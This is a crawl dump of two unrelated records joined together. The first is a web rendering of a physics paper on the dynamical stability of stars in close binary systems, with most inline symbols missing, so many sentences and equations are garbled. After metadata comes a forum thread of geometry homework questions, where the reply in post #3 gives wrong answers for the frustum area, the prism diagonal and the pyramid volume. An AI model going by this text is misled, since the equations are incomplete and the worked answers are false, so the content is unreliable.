, , and as the independent variables that are determined by the hydrodynamical equations.\n\nEquations for , and can be found from the Hamiltonian constraint, the momentum constraint, and the maximal slicing condition tr, where tr is the trace of the extrinsic curvature (details can be found, for example, in ).\n\nAssuming maximal slicing for all times, we have , and can use the trace of the evolution equation for to find\n\n Δ(αψ)=2παψ5(E+2Sijδijψ−4)+78αψ5KijKij. (14)\n\nHere , , and is the flat space Laplacian.\n\nSince we assume the spatial metric to remain conformally flat for all times, the trace free part of the time evolution equation for has to vanish, which yields\n\n 2αψ−4Kij=δilβl ,j+δjlβl ,i−23δijβl ,l. (15)\n\nThis equation shows that the extrinsic curvature no longer represents independent dynamical degrees of freedom (i.e., it may no longer exactly satisfy its fully relativistic evolution equation). Inserting this into the momentum constraint, , where , we find\n\n Δβi+13βj ,ji = [ln(αψ6)],j(βi ,j+βj ,i−23δijβl ,l) (16) + 16παJi.\n\nFinally, the Hamiltonian constraint yields\n\n Δψ=−2πψ5E−KijKijψ58. (17)\n\nFor the post-Newtonian point of view assumed here, a conformally flat spatial metric takes into account all Newtonian and first post-Newtonian terms, and differences from a general, fully nonlinear metric appear at second post-Newtonian order [20, 21]. We can therefore use the above equations, which assume a conformally flat metric, as a starting point for a post-Newtonian approximation. We simplify the problem by neglecting other terms of second or higher post-Newtonian order. In particular, we will neglect the nonlinear terms , and . Note that for static, spherically symmetric spacetimes, these terms vanish identically, so that we still recover full general relativity for these spacetimes.\n\nAdopting this approximation, the field equations reduce to\n\n Δ(αψ)=2παψ5(E+2Sijδijψ−4)≡4πSαψ, (18) Δβi+13βj ,ji=16παJi, (19) Δψ=−2πψ5E≡4πSψ. (20)\n\nWe decompose the equation for using\n\n βi=4Bi−12[χ,i+(Bkxk),i] (21)\n\nso that and satisfy\n\n ΔBi=4παJi, (22) Δχ=−4παJixi. (23)\n\nTo summarize, we have reduced Einstein’s equations to six elliptic equations for the six functions , , and . We solve these equations together with the boundary conditions\n\n αψ=1−1r∫SαψdV+O(r−3), (24) ψ=1−1r∫SψdV+O(r−3), (25) Bx=−xr3∫αJxxdV−yr3∫αJxydV +O(r−4), (26) By=−xr3∫αJyxdV−yr3∫αJyydV +O(r−4), (27) Bz=−zr3∫αJzzdV+O(r−4), (28) χ=1r∫αJixidV+O(r−3), (29)\n\nwhere is the coordinate volume element. Note that having removed some of the nonlinear terms from the elliptic equations (18) to (23), their right hand sides now have compact support. This further simplifies the computations, since in imposing the boundary conditions at a finite separation, we do not truncate any source terms in (18) to (23) that extend to infinity.\n\nHaving neglected some second post-Newtonian terms, our formalism is strictly only first-order post-Newtonian. Note, however, that we have only truncated some of the non-linear terms in the field equations, pieces of which, loosely speaking, can be associated with dynamical features of the gravitational fields. In particular, we still solve the fully relativistic hydrodynamic equations. We therefore retain many of the nonlinear features of full general relativity, and expect that this formalism provides an excellent approximation in several limiting regimes of interest here.\n\nFor example, for static, spherically symmetric stars, we recover the fully relativistic, Oppenheimer-Volkov solution. This is, because we can choose coordinates such that all the terms neglected in the field equations vanish identically, and the equations of hydrodynamics (or, in this case, hydrostatics) are fully relativistic. Constructing sequences of equilibrium solutions, we can apply the energy turning point method and find the onset of radial instability – again without approximation.\n\nCorotational or irrotational binary stars at large separations are very close to being spherically symmetric because the two stars interact only through weak tidal fields (for example, in Newtonian case, see refs.[9, 22]). Hence, our formalism can describe the individual stars to high accuracy, whether or not the stars are very compact and have strong gravitational fields. We therefore expect that our approximations are quite adequate.\n\nIn a binary in which the orbital separation is large compared to the stellar radius , we can treat the gravitational effects and tidal deformation due to the companion star as a small perturbation. We can then expand the gravitational field around the unperturbed, spherical solution [14, 15]\n\n α = (0)α+(2)αϵ2+(4)αϵ4 (30) +(5)αϵ5+(6)αϵ6+(7)αϵ7+⋅⋅⋅, ψ = (0)ψ+(2)ψϵ2+(4)ψϵ4 (31) +(5)ψϵ5+(6)ψϵ6+(7)ψϵ7+⋅⋅⋅, βi = (1)βiϵ+(3)βiϵ3+(5)βiϵ5 (32) +(6)βiϵ6+(7)βiϵ7+(8)βiϵ8+⋅⋅⋅, ~γij = δij+(2)hijϵ2+(4)hijϵ4+(5)hijϵ5+⋅⋅⋅, (33)\n\nwhere we assume\n\n vi∼ui∼(M/a)1/2≲(R/a)1/2∼ϵ, (34)\n\nand where is gravitational mass, and and denote the spherical symmetric solutions. Note that denotes the magnitude of gravitational effects from the companion star, and hence the expansion in terms of is different from a post-Newtonian expansion (see .)\n\nIn our formalism, we can calculate and exactly. Newtonian and first post-Newtonian terms appearing in , and for are also taken into account consistently for all order in , although second post-Newtonian terms in these and are not included. Our approximation is therefore appropriate for investigating the stability of fully general relativistic spherical stars due to Newtonian and first post-Newtonian tidal effects, which is our goal in this paper.\n\nDetails of our numerical methods, for solving both the hydrodynamical equations and the Poisson equations, can be found in . We assume symmetry with respect to equatorial plane, and solve the equations on a uniform grid of size , covering the physical space and where is location of outer boundaries. We use for the spherical symmetric stars, and , 60, and 75 for binary configurations.\n\nAs a numerical check, we monitor the conservation of proper mass\n\n Mp=∫ρ∗dV, (35)\n\ntotal gravitational mass\n\n M≡−2∫SψdV, (36)\n\nand total angular momentum\n\n J≡∫(−yJx+xJy)ψ6dV. (37)\n\nOur difference scheme guarantees conservation of exactly. Accurate conservation of and depends on , and for , the error in one orbital period is for and for , respectively.\n\n## Iii Dynamical stability of spherical static stars\n\nIn this section we calibrate our code by locating the analytically known onset of instability of spherical equilibrium stars.\n\nFor initial conditions, we construct sequences of equilibria satisfying the Oppenheimer-Volkov equations. Note that for these configurations our formalism is exact and recovers the fully relativistic solutions. In Fig. 1 we show the proper mass and the (isotropic) coordinate radius as a function of the central density for a polytrope with . We have taken advantage of the scale freedom in the problem and chosen . Together with , this assignment uniquely determines our non-dimensional units for length, mass, etc.. For any other value of , all the results can be rescaled trivially (see, e.g., ). Note that for a critical central density , the mass goes through a maximum . This maximum marks the onset of radial instability, and separates the stable branch () from the unstable branch () of the sequence.\n\nFor , the compaction of the maximum mass configuration, , is much less than unity (recall as ). Nevertheless, the mass versus central density equilibrium curve still exhibits an extremum, and therefore has all the qualitative features of any value of regarding the issue of radial stability. Choosing therefore allows us to study these qualitative features in a regime in which the post-Newtonian approximation is very reliable.", null, "Figure 1: Proper mass Mp (top panel) and isotropic radius R (botton panel) as a function of central density ρc for relativistic, spherical polytopes with Γ=1.4.", null, "Figure 2: Time evolution of ρ∗ at center of stars for models A – E.\n\nConsider results for five different initial configurations, which we denote by A, B, C, D and E (see Fig. 1). We construct these initial data with a one-dimensional integration of the Oppenheimer-Volkov equations. These data are in equilibrium according to the one-dimensional finite difference equations. Interpolating these data onto the three-dimensional grid of our evolution scheme introduces a slight perturbation of the equilibrium solution, since the truncation error of the three-dimensional finite difference equations is different from the one-dimensional one. Typically, we find that the pressure of the interpolated models is slightly larger than the required equilibrium value on the three-dimensional grid. We compensate for that by artificially decreasing the polytropic constant by a small amount. Note that our finite differencing is convergent, so that for finer grids we need to change by smaller amounts. For the results presented here, the initial radius of the star is covered by 30 grid points.\n\nNote that because of the scale freedom in the problem, reducing is equivalent to increasing the mass. This is, because , where is the polytropic index, has units of mass (or length) in geometrized units. Consider now a model in which we have reduced by, say, a small fraction . We can then rescale this model in order to investigate a different , for example, the original value . Then, the mass of the re-scaled model has to increase by a fraction to remain in equilibrium. For example, reducing by 0.5 % is, for , equivalent to increasing the model’s mass by 0.625 %.\n\nWe can now test the stability of our models by varying by small amounts. Small variations in serve to trigger small initial perturbations away from equilibrium (e.g. “pressure depletion”). Stable models will not change their qualitative behavior, whereas unstable models will. In Fig. 2 we show the time evolution of the central density for the five models. Solid curves are the results for , and dotted curves are for . In this section, we plot time in units of , where is the central value of of the corresponding spherical equilibrium star.\n\nObviously, models A and B oscillate stably, for both values of . The period of these oscillations can be compared with the approximate analytic value \n\n tosc≃2π[3(Γ−1)M2(5Γ−6)RI(3Γ−4−6.75MR)]−1/2, (38)\n\nwhere is the Newtonian (rest) mass, is the Newtonian radius of star, and\n\n I=∫ρr2dV (39)\n\nis the spherical mass moment. Inserting the values and for , we find\n\n tosc≃5.5ρ−1/2c(0.2−6.75MR)−1/2. (40)\n\nFor model A, and hence , which is very close to the value that can be read off in Fig. 2. Obviously, models with a larger compaction have, in units of , a larger oscillation period , which can also be seen in Fig. 2. At the onset of instability, . From equation (40) we therefore find that the maximum mass configuration must have a compaction , which is very close to that of model C.\n\nLeaving for model C, the star oscillates stably, but reducing by only 0.5 % to 0.995, the central density increases monotonically, and the star undergoes gravitational collapse. This indicates that model C is marginally stable against small perturbations, , and very close to the onset of instability. This is obviously true, since its proper mass is only smaller than the maximum allowed mass .\n\nFor models D and E, the star monotonically expands or collapses, and never oscillates: starting with , the star collapses, and for , the star expands by a large factor. Obviously, for the star should be in equilibrium, and neither expand nor collapse. The equilibrium is unstable, however, and even the smallest truncation error induces a growing perturbation, which must ultimately lead to gravitational collapse. Initially, this perturbation may be either an expansion or a contraction. Since the configuration is gravitationally bound, the expansion soon has to turn around and lead to gravitational collapse . Obviously, we would expect that for we find an initial expansion, and for an immediate contraction. However, due to truncation error, the cutoff between expansion and contraction is not precisely at , but instead at a value slightly smaller than unity ( when we use 30 grid points to cover the star). Again, this value approaches unity with increasing grid resolution. This behavior establishes that models D and E are unstable to radial perturbations, which is, of course, what we expected.\n\nWe conclude that we can locate the onset of radial instability, and in particular that we can determine the maximum allowed mass of neutron stars to very high accuracy. This will be very important for determining the stability properties of binary neutron stars.\n\n## Iv Dynamical stability of stars in binary systems\n\nIn this section we present numerical results on the dynamical stability of stars in binary systems. We always assume the two stars to have equal mass, and set up initial data so that they are in a circular binary orbit. Note that for the equation of state is sufficiently soft, so that there is no innermost stable circular orbit [9, 27, 7]. Therefore, we can choose arbitrarily small binary separations, and the orbit of the binary will still be stable. We choose very close binaries, in which the separation of the surfaces of the two stars is much smaller than the orbital separation ( in the terminology of ref. ). For these binaries the tidal effects are strongest, and they are therefore the most suitable configuration to study the stability against gravitational collapse of the individual stars.\n\nWe evolve three different classes of binary initial data. The first class are corotational binaries. For these configurations, self-consistent equilibrium initial data can be constructed in post-Newtonian approximation  and even in general relativity (where the stars are only in quasi-equilibrium, see [16, 7]). We denote the class of post-Newtonian strict equilibrium solutions with a subscript “a”.", null, "Figure 3: Proper mass as a function of the maximum density for each star in a corotational equilibrium binary (filled circles) and for an isolated spherical star (solid line).\n\nIn addition to corotational binaries, we would also like to study irrotational binaries because they are more realistic models for binary neutron stars . Self-consistent irrotational equilibrium binaries in Newtonian gravity have recently been constructed by Uryu and Eriguchi , and a relativistic generalization has been suggested by Bonazzola, Gourgoulhon and Marck . No numerical models are currently available for such data in a post-Newtonian approximation. In the absence of self-consistent, tidally deformed equilibrium data, we therefore take two spherically symmetric stars, put them close together, and artificially assign an irrotational velocity profile which maintains their shape and circular orbit approximately. In order to calibrate these irrotational initial data, which are not strictly in equilibrium, we first perform simulations with a second class of corotational initial data, using spherically symmetric stars, and compare these with the self-consistent post-Newtonian equilibrium models which exist in the corotational case. For this second class, we assign a uniform velocity\n\n (ux,uy,uz)=(−Ωy,Ωx,0) (41)\n\nto each fluid particle, where is the orbital angular velocity. We denote these corotational, near-equilibrium data with a subscript “b”.\n\nFinally, the third class of initial data are irrotational, near-equilibrium models. Again, we put two spherically symmetric stars at a small separation, but now we assign an initial velocity\n\n (ux,uy,uz)=(0,±Ωx0,0) (42)\n\nto each fluid particle. The centers of mass of the two stars are located at , where . The plus sign in (42) corresponds to the star at , and vice versa. We denote this third class of initial data with a subscript “c”.\n\nIn the above velocity profiles, we determine the angular velocity from Kepler’s law\n\n Ω=(MTa3)1/2 (43)\n\nwhere is the sum of the proper mass of the two spherical stars and is the coordinate separation between their centers of mass.\n\nIn the above velocity profiles, it would be more physical to fix instead of . That, however, would involve one more iteration in the preparation of the initial data, and, in our small compaction cases, would make only a negligible difference. We summarize the initial conditions for six different models, two in each class, in Table I.", null, "Figure 4: Time evolution of ρ∗max in the corotational equilibrium binary models Ba and Da. Solid, dotted and dashed lines denote results obtained with N=75, 60, and 50 gridpoints, respectively. For model Ba, we set K=1 initially. For model Da, initial values of K are 1, 0.995 and 0.994 for N=75; 1, 0.992 and 0.99 for N=60; and 1 and 0.99 for N=50. Curves with numerical labels show values of K≠1.\n\nAs in our spherical models, we must vary slightly in order to investigate the stability of the binary models. Equilibrium stars in tidal fields are tidally deformed and have a slightly smaller central density than spherical stars. Using spherical models as initial data for binaries therefore overestimates the central density, which causes the stars to expand initially. As we will see, this can be compensated for by reducing .\n\n### iv.1 Corotational equilibrium models\n\nFollowing Shibata  and Baumgarte et al. [7, 16], we construct self-consistent equilibrium initial data, describing two corotational binary stars in contact (). In Fig. 3, we plot the proper mass of each star as a function of the central density (filled circles), and compare these values with those for spherical stars in isolation (solid line). The maximum allowed mass of binary stars is slightly larger than that of spherical stars in isolation (see the discussion in ).", null, "Figure 5: Snapshots of density contour lines and the velocity flow (vx,vy) in the equatorial plane for model Ba. Contour lines are drawn for ρ∗/ρ∗ 0=10−0.3j, where ρ∗ 0 denotes the maximum value at t=0, for j=0,1,2⋅⋅⋅10. Vectors indicate the local velocity field. Time is shown in units of orbital period P. See Table I for the relation between P and ρmax,0.\n\nWe show results for grid sizes , 50, 60, and 75, and find that our code is second order accurate. The proper mass evaluated on a grid with a grid spacing , , therefore scales according to\n\n Mp(d)=M0+M2d2+O(d3). (44)\n\nTaking values for different (and hence ), we can eliminate the second order error term by Richardson extrapolating to , which yields the value . This is the value that we plotted in Fig. 3. In Table II we summarize these results by tabulating the masses for the different grid resolutions, together with the Richardson extrapolated value .", null, "Figure 6: Same as Fig. 5, except for model Da at t=0. For this sequence we set K=0.994 initially.\n\nComparing with for and 75, we find deviations of and , respectively. This is a lower limit on the truncation error that we have to expect in the subsequent evolution.\n\nNote that in Fig. 3, we plot the mass versus maximum density for a sequence of constant separation (namely for contact binaries). In this graph, the onset of instability need not coincide with the maximum mass configuration. Instead, the onset of instability can be located by constructing sequences of constant angular momentum (see Baumgarte et al. ). However, we expect that the onset of instability is very close to the maximum mass configuration. We therefore present results for two models, one with a maximum density slightly less than the maximum mass model (denoted Ba, ), and one with a maximum density slightly larger (Da, ). For both models, the orbital period is in units of where is maximum value of at .\n\nIn Fig. 4, we show the time evolution of the maximum value of () for models Ba and Da. We show results for three different grid resolutions, , 60, and 75, where we have kept the location of the outer boundary constant. We picked such that each star is covered by grid points (see Table I).\n\nFor model Da, we also picked several different values of , and marked all simulations with accordingly in Fig. 4. Depending on , these models either collapse or expand, but never oscillate stably. This indicates that they are dynamically unstable, as we have expected. As in the discussion of unstable spherical models, we would expect the cutoff between initial expansion and contraction to be at if we had arbitrary accuracy. This is not the case, but we again find that increasing the grid resolution makes this cutoff approach unity (cutoff value of is less than for , for , and for ).\n\nFor model Ba, we only show results for . Obviously, this configuration oscillates stably. The oscillations are due to a slight inconsistency between the initial data and the evolution scheme. The amplitude of these oscillations decreases with increasing grid number, which shows that our method is convergent. Note that of this configuration is 1.250, which is marginally larger than the maximum allowed rest mass of an isolated, spherical star, . We therefore conclude that all stars that are stable in isolation are also stable in a corotational binary. We expect that the reverse is not true: a star in a close binary can support more mass than an isolated, spherical star. Note that our results are different from those of WMM, who found that stars with masses of as much as 10 % or more below the maximum allowed rest mass in isolation were destabilized in a close binary. At this level, such an effect would be discerned easily by our code, but it is not present.\n\nIn Figs. 5 and 6 , we show contour lines of and the velocity field of in the equatorial plane for models Ba and Da, using a grid resolution of . For model Da we set . Note that for our adopted soft equation of state, the stars are very centrally condensed. The tidal field mostly deforms the very low density envelope, which is hardly visible in these plots. The two envelopes are pulled towards the binary companion, and in our contact cases, touch at the origin. The high density cores, however, are hardly deformed by the tidal field, and are still fairly far separated.\n\nFor model Ba, we show contours at , , and , all in units of , which corresponds to the initial condition, a little more than half an orbital period, and a little over an orbital period. It is obvious from the graphs that the two stars stably orbit each other. Note also that the velocity field remains close to being corotational, and that we do not see any evidence of vorticity features which have been reported in ref. .\n\nFor model Da we show contours at and , which is a little less than half an orbital period. It can be seen very clearly how the star contracts and collapses.\n\n### iv.2 Corotational near-equilibrium models\n\nWe now present numerical results for our corotational near-equilibrium models. We do this to calibrate our code, and to show that our near-equilibrium models are good approximations to self-consistent equilibrium models . This justifies studying such near-equilibrium models for irrotational binaries.", null, "Figure 7: Time evolution of ρ∗max in the corotational, near-equilibrium binary models Bb and Db. Initially, we set K=0.98 (dotted line), K=0.975 (solid line) and K=0.97 (dashed line) for model Bb, and K=0.98 (dotted line) and K=0.975 (solid line) for model Db. For models Bb and Db, the orbital period is ∼39 and 46ρ−1/2max,0.", null, "Figure 8: Same as Fig. 5, but for model Bb. For this sequence we set K=0.975 initially.\n\nFor all the simulations discussed in this and the following subsection, we use a numerical grid with grid points. We adjust the outer boundary such that the radius of each star is covered with grid points. For the models Bb and Bc we used and for Db and Dc (see Table I). We construct spherical models, and placed them on the grid such that their centers of mass is located at . Note that these stars are not in contact. However, the stars are not tidally deformed, and therefore separation of the center of masses of the two stars is slightly smaller than for the self-consistent equilibrium models. The orbital period for these binaries is and 46 in units of , respectively.\n\nIn Fig. 7, we show the time evolution of for models Bb and Db. Dotted, solid and dashed lines denote results for , and , respectively. As before, model Db either expands or contracts, but never oscillates stably. We again conclude that Db is dynamically unstable. Model Bb, on the other hand, exhibits stable oscillation for several different values of , and we conclude that it is dynamically stable.\n\nIt is interesting to note that even with a reduced value of , model Bb initially expands, albeit stably. Only reducing the pressure to a value smaller than that (), the configuration is roughly in equilibrium. This can be understood quite easily, because the spherical star is not a self-consistent equilibrium solution. The tidal field tends to deform the star, which reduces the central density. Therefore, our initial data have too high a central density for their mass, and the star starts expanding. This can be compensated for by reducing and hence the pressure. As we have argued before, reducing is equivalent to increasing the mass, and indeed this is another way of understanding why a star in a binary can support more mass than a star in isolation.\n\nIn Fig. 8, we show contour lines of and the velocity field in the equatorial plane for model Bb, where we have set . We show the configuration at , and . Comparing these plots with Fig. 5, one can see that the center of masses of the two stars are closer. During the evolution, the stars loose their spherical shape and adjust to the tidal field. However, all the qualitative features are very similar to the self-consistent equilibrium simulations. In particular, the velocity field remains nearly corotational, and we do not see any evidence of the double vorticity fields as reported by WMM.\n\nThis test suggest that the spherical near-equilibrium models are very good approximations to self-consistent equilibrium configurations for the models and issues we are investigating here (but see footnote ).\n\n### iv.3 Irrotational near-equilibrium models\n\nViscosities in neutron stars are expected to be too small to bring neutron star binaries into corotation on the timescale of their evolution . Numerical models exist only in Newtonian gravity [29, 30] or in the Newtonian and post-Newtonian ellipsoidal approximation [22, 11]. We therefore adopt the spherical near-equilibrium approximation to construct initial models, which we have calibrated and found to be adequate in section IV.B for corotational cases.", null, "Figure 9: Time evolution of ρ∗max in the irrotational, near-equilibrium binary models Bc and Dc. Initial values of K are 0.99, 0.985 and 0.98 for model Bc, and 0.98 and 0.985 for model Dc. Solid, dotted and dashed lines denote results for K=0.98, 0.985 and 0.99, respectively. The orbital period of models Bc and Dc is ∼39, and 46ρ−1/2max,0, again.", null, "Figure 10: Same as Fig. 5, but for model Bc. For this sequence, we set K=0.99 initially.\n\nWe again vary and choose , and for model Bc, and and for model Dc. In Fig. 9, we show time evolution of for models Bc and Dc. Dashed, dotted and solid lines denote results for , and , respectively. As in the corotational cases, model Dc cannot be held stably, whereas model Bc oscillates for all these choices of . Therefore, we again conclude that model Bc is dynamically stable, whereas Dc is not.\n\nIt is interesting to note that for these irrotational models, we had to reduce by a somewhat smaller amount to minimize the amplitude of oscillations in model Bc than for the corotational model Bb ( here, and for model Bb). This can be understood very easily, because in corotational models, the individual stars are spinning, and are therefore stabilized and deformed by both the tidal field and the their own spin. In irrotational binaries, the stars have almost no spin (with respect to distant inertial observers), and are deformed only by the tidal field. Therefore, putting a star into an irrotational binary will reduce the central density by less than putting the same star into a corotational binary. As a consequence, we have to reduce by a smaller amount to compensate. Applying our scaling argument, this result means that a irrotational binary can support less mass than a corotational binary, but still more than a spherical star in isolation. This result is corrobated by the post-Newtonian ellipsoidal models constructed in .\n\nIn Fig. 10, we show contour lines of and the velocity field in the equatorial plane for model Bc and initially. We show contours at , , and . For the bulk of the matter at the core of the stars, the velocity field remains approximately irrotational, and the stars stably orbit each other. We conclude that there is no qualitative difference between corotational and irrotational binaries as far as their radial stability properties are concerned.\n\n## V Summary\n\nWe perform post-Newtonian, dynamical simulations of close binaries in circular orbit. In particular, we study the stability of the individual stars against gravitational collapse in both corotational and irrotational systems containing stars of equal mass.\n\nWe have chosen a soft, adiabatic equation of state with , for which there is no innermost stable circular orbit, so that the binary orbit is stable even when the stars are in contact, and for which the onset of instability for a spherical star in isolation occurs at a very small value of the compaction . We can therefore study the individual stars’ stability properties in near contact binaries, for which the tidal effects are strongest, and in a regime in which a post-Newtonian approximation is very accurate.\n\nWe do not find any crushing effect as reported by WMM . In contrast, the maximum density in both corotational and irrotational binaries is smaller than that of spherical stars in isolation. We find that stars in binaries can support more mass than in isolation. Moreover, all stars that are stable against radial perturbations in isolation, will also be dynamically stable when put into a binary.\n\nAll these results are in complete agreement with, for example, the findings of Baumgarte et al. [16, 17], Flanagan , and Thorne . For the most part, their discussions rigorously address secular stability only. Several different arguments can be invoked to suggest that secularly stable binaries are also dynamically stable, but this is strictly proven only in Newtonian theory (see also ). Our dynamical calculations reported in this paper are the first to directly confirm dynamical stability, at least within our post-Newtonian approximation.\n\nWe compare, in a near-equilibrium approximation, corotational and irrotational binary models. As expected, stars in corotational binaries can support slightly more mass than in irrotational binaries, but apart from these small differences we do not find any qualitative difference in their radial stability properties. A more rigorous treatment will require the construction of post-Newtonian, irrotational equilibrium binary models for initial data.\n\nSince our computations have been performed in nondimensional units, our results apply not only to neutron star binaries, but also to binaries of white dwarfs and supermassive stars. In fact, the equations of state of massive white dwarfs (ideal degenerate, extremely relativistic electrons) and supermassive stars (radiation thermal pressure) are closely approximated by the value that we have adopted. These binaries may be important low frequency gravitational wave sources for future space-based gravitational waved detectors, like LISA.\n\n###### Acknowledgements.\nNumerical computations were performed on the FACOM VX/4R machine in the data processing center of the National Astronomical Observatory of Japan. M. S. wishes to express his gratitude to the University of Illinois at Urbana-Champaign for its hospitality during his stay in September, 1997, when this project was initiated. This work was supported by a Japanese Grant-in-Aid of the Ministry of Education, Culture, Science and Sports (Nos. 08NP0801 and 09740336), and by NSF Grant AST 96-18524 and NASA Grant NAG 5-3420 at Illinois.\n\n## References\n\n[\n\nTable I.  Initial conditions of binary models. We tabulate the maximum density , the radius of a spherical star of the same rest mass in isolation, the orbital period in units of , the nature of the initial velocity field and matter profile, and the location of the outer boundary (see text). All quantities are shown in units of .\n\n Model ρmax,0/10−5 R∞ P×√ρmax,0 Velocity Field Matter Profile L Ba 5 53 48.6 corotation equilibrium 141 Da 15 38 50.2 corotation equilibrium 97.5 Bb 5 53 39.4 corotation spherical 125 Db 15 38 45.9 corotation spherical 96 Bc 5 53 39.4 irrotation spherical 125 Dc 15 38 45.9 irrotation spherical 96\n\nTable II.  Proper mass of each star in a corotational equilibrium binary for different grid resolutions. We tabulate versus central density for , 50, 60, and 75. We also list the Richardson extrapolated value as well as the proper mass of the spherical model in isolation with the same central density.\n\n1.1954    1.2347    1.2469    1.2451\n1.2004    1.2402    1.2526    1.2509\n1.2031    1.2431    1.2556    1.2539\n1.2051    1.2455    1.2581    1.2565\n1.209 1.250 1.263 1.261\nSpherical    1.1933    1.2344    1.2482    1.2476\n\n]\n\nWant to hear about new tools we're making? Sign up to our mailing list for occasional updates.\n\nIf you find a rendering bug, file an issue on GitHub. Or, have a go at fixing it yourself – the renderer is open source!\n\nFor everything else, email us at [email protected]." ]
[ null, "https://media.arxiv-vanity.com/render-output/5912546/x1.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x2.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x3.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x4.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x5.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x6.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x7.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x8.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x9.png", null, "https://media.arxiv-vanity.com/render-output/5912546/x10.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9099168,"math_prob":0.9726834,"size":42698,"snap":"2022-40-2023-06","text_gpt3_token_len":9603,"char_repetition_ratio":0.15568933,"word_repetition_ratio":0.03828306,"special_character_ratio":0.22640404,"punctuation_ratio":0.14535315,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98776966,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-25T01:30:35Z\",\"WARC-Record-ID\":\"<urn:uuid:9fdc1a5f-346a-4fe3-aa2a-c39f9fa02b30>\",\"Content-Length\":\"729211\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d3245710-a389-458e-b086-8260eb5be822>\",\"WARC-Concurrent-To\":\"<urn:uuid:29cc9257-6fa5-4c95-9dc1-0033a381be47>\",\"WARC-IP-Address\":\"104.21.14.110\",\"WARC-Target-URI\":\"https://www.arxiv-vanity.com/papers/gr-qc/9805026/\",\"WARC-Payload-Digest\":\"sha1:BOY2WFTFGMI5SSSNMPILGQU5OAM6FSX7\",\"WARC-Block-Digest\":\"sha1:QE5QFO74E4BHBQOIC57MVNVAVIRSJVI4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334332.96_warc_CC-MAIN-20220925004536-20220925034536-00657.warc.gz\"}"}
https://web2.0calc.com/questions/help-pleeeease-due-tomorrow
[ "+0\n\n# Help pleeeease, due tomorrow!\n\n0\n281\n4\n\n1) Let $APQRS$ be a pyramid, where the base $PQRS$ is a square of side length $20$. The total surface area of pyramid $APQRS$ (including the base) is $600$. Let $W$, $X$, $Y$, and $Z$ be the midpoints of $\\overline{AP}$, $\\overline{AQ}$, $\\overline{AR}$, and $\\overline{AS}$, respectively. Find the total surface area of frustum $PQRSWXYZ$ (including the bases).\n\n2) In a certain rectangular prism, the total length of all the edges is $40,$ and the total surface area is $48.$ Find the length of the diagonal connecting one corner to the opposite corner.\n\n3) In a certain regular square pyramid, all of the edges have length $12$. Find the volume of the pyramid.\n\nI'm down with the flu and haven't had time to do these.. Any help is appreciated!\n\nFeb 22, 2020\n\n#1\n0\n\n4) The perimeter of the cross-sectional triangle of a prism is $45 \\text{ cm}$, the radius of the incircle of the triangle is $8 \\text{ cm}$ and the volume of the prism is $900 \\text{ cm}^3$. What is the length of the prism?\n\n5) A rectangular prism with length $l$, width $w$, and height $h$ has the property that $l + w + h = 11$ and $l^2 + w^2 + h^2 = 59$  What is the surface area of the prism?\n\n6) A square-based pyramid of height $3$ cm and base length $2$ cm is set on its square base. Water is poured through an infinitesimally small hole in the top of the pyramid to a height of $1$ cm measured from the base, and then the hole is sealed. If the pyramid is turned upside-down, what will be the new height of the water?\n\nFeb 22, 2020\n#2\n0\n\nAh these are AOPS questions.\n\nHint for nr. 3.\n\nWe know that the 4 sides are equilateral triangles, and then we can find slant height. Using pythag, we can then find the height of the pyramid.\n\nFeb 22, 2020\n#3\n0\n\n1) The surface area is 20 + 600/4 = 170.\n\n2) The length of the diagonal is 2*sqrt(17).\n\n3) The height of the pyramid works out to 4*sqrt(3), so the volume is 1/3*4*sqrt(3)*12^2 = 192*sqrt(3).\n\nFeb 25, 2020\n#4\n+1\nApr 1, 2020" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85910964,"math_prob":0.9997045,"size":1932,"snap":"2020-24-2020-29","text_gpt3_token_len":546,"char_repetition_ratio":0.15248963,"word_repetition_ratio":0.0,"special_character_ratio":0.3084886,"punctuation_ratio":0.11820331,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99974555,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-11T10:58:04Z\",\"WARC-Record-ID\":\"<urn:uuid:fd3d300a-3cfb-4a8e-962d-8d5f6a87541c>\",\"Content-Length\":\"29340\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fd963216-ca43-4f73-b478-aa56148d4bca>\",\"WARC-Concurrent-To\":\"<urn:uuid:406cfcde-1592-40d3-9c65-e15a0c97cc6e>\",\"WARC-IP-Address\":\"209.126.117.101\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/help-pleeeease-due-tomorrow\",\"WARC-Payload-Digest\":\"sha1:CYBZCGMAFTCNUYCL5ZYDKH6ODVVYL6PQ\",\"WARC-Block-Digest\":\"sha1:QU2YXQSOS3SZE5V2ICCN4BHY4SOLUWGU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655929376.49_warc_CC-MAIN-20200711095334-20200711125334-00159.warc.gz\"}"}
https://answers.everydaycalculation.com/add-fractions/30-8-plus-27-24
